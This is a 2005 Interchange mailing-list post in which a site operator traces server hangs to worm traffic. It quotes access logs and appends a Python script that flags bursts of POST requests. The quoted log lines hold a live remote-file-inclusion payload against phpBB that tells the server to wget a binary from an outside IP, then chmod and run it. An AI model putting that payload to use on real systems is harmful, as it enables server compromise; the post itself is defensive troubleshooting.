[ic] mod_interchange and Apache MaxClients

John1 list_subscriber at yahoo.co.uk
Sat Dec 17 12:05:11 EST 2005


On Thursday, December 01, 2005 9:18 PM, rphipps at reliant-solutions.com wrote:

>> From: interchange-users-bounces at icdevgroup.org
>> [mailto:interchange-users-bounces at icdevgroup.org] On Behalf Of Ron
>> Phipps
>> Sent: Thursday, December 01, 2005 9:24 AM
>>
>> We were visited this morning again by this worm and my script noticed
>> the site was not responding so IC was restarted.  It's definitely
>> something in this worm that is causing Apache/mod_interchange/ic to
>> hang up.  I'm setting up a test domain today with the cgi-bin access
>> method, I'll modify my script to then check this test domain when it
>> notices the main domain is not responding to see if IC can still
>> serve pages properly.  This will then narrow it down whether it's an
>> issue with IC or Apache/mod_interchange.
>>
>> Thanks,
>> -Ron
>
> I have setup a test domain and catalog which connects to the live IC
> server.  On this test site I have a page containing: "CGI UP".  When
> my script notices that the main site is not responding it will then
> try to hit the test site using the tlink cgi and will check for the
> result of "CGI UP".  This will tell us whether or not IC can be
> accessed via the CGI method when it cannot be accessed via
> mod_interchange.
>
> Our site was brought down for a 2nd time this morning by another worm
> trying to access exploits in awstats and xml-rpc.
>
Sorry for going quiet on this thread over the last few weeks, but things 
are just a bit hectic at the moment - will hopefully have a bit more time 
after Christmas.

Ron, I was going to try to set up the CGI test domain like you have done but 
haven't had the chance yet - have you reached any conclusions?  Will Interchange 
still respond via the tlink cgi?

Anyway, what has prompted me to post is that our site was brought down 4 
times yesterday, by a very similar (but different) script to before...

It is very clear that it is POST requests that are bringing Interchange 
down.  I am not sure whether it is the *content* of a particular POST 
request or whether it is just the fact that several POST requests are made 
in the space of a few seconds from the same client.

Explanation of why I conclude that POST requests are the culprit
================================================================

Just before the server goes down we see the below two entries in our log.

our_ip_address - - [16/Dec/2005:13:16:39] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" 404 259
our_ip_address - - [16/Dec/2005:13:16:40] "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" 404 251

Notice these are both GET requests.  There are no POST requests showing in 
the log.

So, I search Google for some information about the above worm and stumble 
across someone else's access log.  These are the entries in their log:

x.x.x.x - - [16/Dec/2005:11:49:40 -0600] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" 404 259
x.x.x.x - - [16/Dec/2005:11:49:42 -0600] "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" 404 251
x.x.x.x - - [16/Dec/2005:11:49:47 -0600] "POST /xmlrpc.php HTTP/1.1" 404 216
x.x.x.x - - [16/Dec/2005:11:49:48 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 221
x.x.x.x - - [16/Dec/2005:11:49:50 -0600] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 228
x.x.x.x - - [16/Dec/2005:11:49:52 -0600] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 229
x.x.x.x - - [16/Dec/2005:11:49:56 -0600] "POST /drupal/xmlrpc.php HTTP/1.1" 404 223
x.x.x.x - - [16/Dec/2005:11:49:57 -0600] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 229
x.x.x.x - - [16/Dec/2005:11:49:59 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 226
x.x.x.x - - [16/Dec/2005:11:50:00 -0600] "POST /xmlrpc.php HTTP/1.1" 404 216
x.x.x.x - - [16/Dec/2005:11:50:02 -0600] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 223
x.x.x.x - - [16/Dec/2005:11:50:03 -0600] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 223

The above POST requests never made it to our access log, so it seems it is 
these POST requests, or the POST /xmlrpc.php specifically, that is bringing 
down Interchange.

This is *exactly* the same behaviour as I was seeing a few weeks ago with 
the similar (but not identical) worm/hacking script, hence the conclusion 
earlier in this thread that it is the POST requests that are the problem.

Ron, do you see similar behaviour?

BTW, I found a couple of links to HTTP flood utilities that could be used to 
test whether it is the spurious POST requests themselves that are causing 
the problem, or merely the fact that there is a quick succession of spurious 
POST requests from the same IP address.  Unfortunately, I haven't yet had 
the chance to make any tests with these utilities myself, but here are the links 
in case anyone else thinks they may be useful for tests:
http://httpd.apache.org/test/flood/
http://support.microsoft.com/default.aspx?scid=kb;en-us;324094

Thanks for your help... 
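One way to correlate a hang with the burst the poster describes is to scan the access log for a client that fires several 404'd POSTs within a few seconds. The script below is an added example, not code from the thread or from Interchange; the log lines embedded in it are constructed from the shape of the entries quoted above (TEST-NET addresses, both with and without a timezone offset), and the 30-second window and threshold of 5 are assumptions to tune for a real site.

```python
"""Flag clients that send a burst of POST requests to non-existent paths.

Added example (not from the original thread). The affected server may never
log the POSTs that hang it, so this is meant to be run against the log of a
front-end or test host, or against the log once the server is back up.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache common log format: host ident user [time] "method path proto" status bytes.
# The timezone offset is optional because the quoted logs differ on that point.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>\d{2}/\w{3}/\d{4}:\d{2}:\d{2}:\d{2})(?: [+-]\d{4})?\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample, modelled on the xmlrpc.php probe quoted in the post.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Dec/2005:11:49:40 -0600] "GET /index.html HTTP/1.1" 200 1043
203.0.113.7 - - [16/Dec/2005:11:49:47 -0600] "POST /xmlrpc.php HTTP/1.1" 404 216
203.0.113.7 - - [16/Dec/2005:11:49:48 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 221
203.0.113.7 - - [16/Dec/2005:11:49:50 -0600] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 228
203.0.113.7 - - [16/Dec/2005:11:49:52 -0600] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 229
203.0.113.7 - - [16/Dec/2005:11:49:56 -0600] "POST /drupal/xmlrpc.php HTTP/1.1" 404 223
198.51.100.9 - - [16/Dec/2005:11:49:57] "POST /cgi-bin/ic/order HTTP/1.1" 200 5120
"""

def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S")
    rec["status"] = int(rec["status"])
    return rec

def find_post_bursts(lines, window=30, threshold=5, status=404):
    """Return [(ip, count, first_ts, last_ts, paths)] for each client that made
    at least `threshold` POSTs answered with `status` inside `window` seconds."""
    recent = defaultdict(deque)   # ip -> (ts, path) entries still inside the window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or rec["status"] != status:
            continue
        q = recent[rec["ip"]]
        q.append((rec["ts"], rec["path"]))
        while (rec["ts"] - q[0][0]).total_seconds() > window:   # slide the window
            q.popleft()
        if len(q) >= threshold and len(q) > flagged.get(rec["ip"], (0, 0))[1]:
            flagged[rec["ip"]] = (rec["ip"], len(q), q[0][0], rec["ts"],
                                  sorted({p for _, p in q}))
    return list(flagged.values())

if __name__ == "__main__":
    for ip, n, first, last, paths in find_post_bursts(SAMPLE_LOG.splitlines()):
        print(f"{ip}: {n} x POST->404 in {(last - first).total_seconds():.0f}s: {paths}")
```

Run against the log of the window just before a restart, a hit here supports the "burst of POSTs" theory; no hit while the hang still occurs points at request content instead.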

